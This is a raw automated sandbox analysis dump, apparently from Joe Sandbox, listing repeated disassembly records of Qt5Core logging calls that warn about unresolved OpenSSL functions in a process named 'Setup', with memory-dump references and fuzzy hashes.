                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A364E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A3650D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A36524
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_free
                                                                                                                                                              • API String ID: 646154281-3017237637
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408D0,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A314D8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408D0,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A314FD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408D0,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31514
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: DH_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-2990544216
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408EF,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31858
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408EF,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A3187D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408EF,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31894
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EC_KEY_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1093401952
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A33A78
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A33A9D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A33AB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_CIPHER_get_bits
                                                                                                                                                              • API String ID: 646154281-54262349
                                                                                                                                                              • Opcode ID: 5dc9db68ac91c55607b06dc2b95d3512ff84ddd8c056768867bec85d2ade2f75
                                                                                                                                                              • Instruction ID: 42a8148aa26820bfc1b67cf745f2192f9b1dbd0cb66dc5a8b01b27331109e6f8
                                                                                                                                                              • Opcode Fuzzy Hash: 5dc9db68ac91c55607b06dc2b95d3512ff84ddd8c056768867bec85d2ade2f75
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF09095F0EB9281EBC3AB71E8016A53392AF84B10F409037DD6D4B321FE2CD0468E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41051), ref: 00007FFBA1A309E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41051), ref: 00007FFBA1A30A0D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41051), ref: 00007FFBA1A30A24
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: BIO_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-2523554001
                                                                                                                                                              • Opcode ID: 7e4d4a8dc06dd8ca57853c4a86bf1538ebfb87532bd3a4c1c7ef3bab2b73e11f
                                                                                                                                                              • Instruction ID: f2ae68a3ad05558d231b07717ba5b47d11967bb4729dad9db4c1ca4078a978f5
                                                                                                                                                              • Opcode Fuzzy Hash: 7e4d4a8dc06dd8ca57853c4a86bf1538ebfb87532bd3a4c1c7ef3bab2b73e11f
                                                                                                                                                              • Instruction Fuzzy Hash: FEF09095F1EA8281EBC3AB75E8112A53392AF84B10F409137DD6D4B321FE2CD0468E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41855), ref: 00007FFBA1A33A08
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41855), ref: 00007FFBA1A33A2D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41855), ref: 00007FFBA1A33A44
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_CIPHER_description
                                                                                                                                                              • API String ID: 646154281-4149912388
                                                                                                                                                              • Opcode ID: feeb667e1a1df9108bae63c569e1858192fac83c6c368c71186f926b20f22706
                                                                                                                                                              • Instruction ID: 222100a80a6ec0217d42b8ceb155115eb3f232de80fa2a0b2d76fe8298e70dee
                                                                                                                                                              • Opcode Fuzzy Hash: feeb667e1a1df9108bae63c569e1858192fac83c6c368c71186f926b20f22706
                                                                                                                                                              • Instruction Fuzzy Hash: 20F09095F1EA8281EFC3AB75E8022A53392AF84B10F409037DD6D4B321FE2CD0468E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36948
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3696D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36984
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_getm_notBefore
                                                                                                                                                              • API String ID: 646154281-627992934
                                                                                                                                                              • Opcode ID: 58f98abf91624305193f85785f8364f6c192a77072e8bb27bff6197d34daf3e8
                                                                                                                                                              • Instruction ID: 5fe35a902cd57c892aeaa2cc03eed9ff89081a1aedc79bbb1bfae14f66200ecb
                                                                                                                                                              • Opcode Fuzzy Hash: 58f98abf91624305193f85785f8364f6c192a77072e8bb27bff6197d34daf3e8
                                                                                                                                                              • Instruction Fuzzy Hash: 23F0B495F0EA8281EBD39B71E8116B53392BF84B10B409437DD6D4B321FE3CE1498E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45960), ref: 00007FFBA1A35138
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45960), ref: 00007FFBA1A3515D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45960), ref: 00007FFBA1A35174
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_new
                                                                                                                                                              • API String ID: 646154281-4035636854
                                                                                                                                                              • Opcode ID: f33494bd6e3c0270f5e8605b053ac834324da2d340bcee9840f912a335fedd72
                                                                                                                                                              • Instruction ID: 47de2e4fe0a65a2de6abf218dc27431b1a1325cfb13cf768e39ba0c4f7b69cfb
                                                                                                                                                              • Opcode Fuzzy Hash: f33494bd6e3c0270f5e8605b053ac834324da2d340bcee9840f912a335fedd72
                                                                                                                                                              • Instruction Fuzzy Hash: 4FF0B495F0EF8281EBD3AB75E8056A57392AF84B10F408137DD6D4B321FE2CD0458E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A319A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A319CD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A319E4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EC_get_builtin_curves$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-2915546236
                                                                                                                                                              • Opcode ID: 0a2e28e2c2f627dfd8412e6fc12f8307c90f3f00a692441ee627e8248f77a650
                                                                                                                                                              • Instruction ID: 79509de97ebefa6510dd827ee56d0d4668c0b327bffce6ed8429ba459d6f1fdb
                                                                                                                                                              • Opcode Fuzzy Hash: 0a2e28e2c2f627dfd8412e6fc12f8307c90f3f00a692441ee627e8248f77a650
                                                                                                                                                              • Instruction Fuzzy Hash: 47F09095F0EA8281EBD3AB71E8112A53292BF84B10B409137DD6D8B321FE2C90458E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4101A), ref: 00007FFBA1A30978
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4101A), ref: 00007FFBA1A3099D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4101A), ref: 00007FFBA1A309B4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: BIO_ctrl$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3851655379
                                                                                                                                                              • Opcode ID: ce58a40225c3576f1e86a6092e39bb3d5583bc0001feb2831a8e20232d6869ff
                                                                                                                                                              • Instruction ID: 5a019b89935e88ac9af21661f0c35fa9f11ae8a6fbacd93a0b99e8cb83a64bc8
                                                                                                                                                              • Opcode Fuzzy Hash: ce58a40225c3576f1e86a6092e39bb3d5583bc0001feb2831a8e20232d6869ff
                                                                                                                                                              • Instruction Fuzzy Hash: 97F09695F0EA9281EBC3A735D8112A43652BF44B10B409137DD7D4B7A1FE3C94058E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368D8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368FD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36914
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_getm_notAfter
                                                                                                                                                              • API String ID: 646154281-3196714075
                                                                                                                                                              • Opcode ID: f98a506ed024266597f57e151b83708af27419c24b28636dd4bd6ee15d4c9ade
                                                                                                                                                              • Instruction ID: f4dd88890d203448cc7baebc5bd7b7ab47e9b7221d726fa91b3d0ab34e63b44c
                                                                                                                                                              • Opcode Fuzzy Hash: f98a506ed024266597f57e151b83708af27419c24b28636dd4bd6ee15d4c9ade
                                                                                                                                                              • Instruction Fuzzy Hash: D8F09095E0FA8281EBC39B71E8112A53692BF84B10B409037DD6D4B321FE2CD5058E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40DAA,?,?,?,?,00007FFBA1A24ACC), ref: 00007FFBA1A318C8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40DAA,?,?,?,?,00007FFBA1A24ACC), ref: 00007FFBA1A318ED
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40DAA,?,?,?,?,00007FFBA1A24ACC), ref: 00007FFBA1A31904
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EC_KEY_get0_group$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-361053210
                                                                                                                                                              • Opcode ID: 1c007354df5a2a0466928218107a39510c5c0e2f905e3c497a404785e175a3f0
                                                                                                                                                              • Instruction ID: fe356097316089dfd36921bfce8c1b13ae296097fb703b4dbc997b80196b7b39
